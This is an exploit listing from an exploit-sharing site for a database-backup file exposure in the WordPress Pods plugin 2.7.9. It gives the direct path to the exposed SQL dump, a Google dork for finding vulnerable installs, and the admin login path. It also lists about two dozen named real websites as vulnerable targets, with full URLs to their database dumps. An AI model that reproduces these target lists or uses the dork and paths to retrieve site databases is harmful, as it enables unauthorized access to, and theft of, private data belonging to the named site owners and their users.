WordPress Pods 2.7.9 Database Disclosure Vulnerability

2018-11-25T00:00:00
ID 1337DAY-ID-31670
Type zdt
Reporter KingSkrupellos
Modified 2018-11-25T00:00:00

Description

WordPress Pods plugin version 2.7.9 suffers from a database disclosure vulnerability.

                                        
                                            #################################################################################################

# Exploit Title : WordPress Pods Plugins 2.7.9 Database Backup Arbitrary
File Download Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Vendor Homepage :
+ wordpress.org/plugins/pods/ ~ pods.io
+
github.com/openmhealth/omh.website/blob/master/wp-content/plugins/pods/sql/dump.sql
# Software Download Link : downloads.wordpress.org/plugin/pods.2.7.9.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.7.9
# Google Dorks : inurl:/wp-content/plugins/pods/
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/plugins/pods/sql/dump.sql

#################################################################################################

# Example Vulnerable Sites =>

[+] oljesaljarna.se/wp-content/plugins/pods/sql/dump.sql

[+] right-ink.com/wp-content/plugins/pods/sql/dump.sql

[+] annpettersson.se/wp-content/plugins/pods/sql/dump.sql

[+] actuarchi.com/wp-content/plugins/pods/sql/dump.sql

[+] stcp.com.br/wp-content/plugins/pods/sql/dump.sql

[+] vallicella.fr/wp-content/plugins/pods/sql/dump.sql

[+] erichalfvarson.com/wp-content/plugins/pods/sql/dump.sql

[+] spinefarmrecords.com/wp-content/plugins/pods/sql/dump.sql

[+] few.org/wp-content/plugins/pods/sql/dump.sql

[+] vbs-jasper.com/wp-content/plugins/pods/sql/dump.sql

[+] kirabpemuda2018.com/wp-content/plugins/pods/sql/dump.sql

[+] liveandinspire.com/wp-content/plugins/pods/sql/dump.sql

[+] househunters.org/listings/wp-content/plugins/pods/sql/dump.sql

[+] radioradio.fr/wp-content/plugins/pods/sql/dump.sql

[+] hbclebanon.com/wp-content/plugins/pods/sql/dump.sql

[+] montevidarentals.com/wp-content/plugins/pods/sql/dump.sql

[+] autosijalice.rs/wp-content/plugins/pods/sql/dump.sql

[+] smseafoodmarket.com/wp-content/plugins/pods/sql/dump.sql

[+] brno-cernovice.cz/wp-content/plugins/pods/sql/dump.sql

[+] inovageracao.com/wp-content/plugins/pods/sql/dump.sql

[+] linneindustries.com/wp-content/plugins/pods/sql/dump.sql

[+] ecovidaproperties.com/wp-content/plugins/pods/sql/dump.sql

[+] hwzone.co.il/wp-content/plugins/pods/sql/dump.sql

[+] inkafarma.com.pe/wp-content/plugins/pods/sql/dump.sql

#################################################################################################

#  0day.today [2019-01-12]  #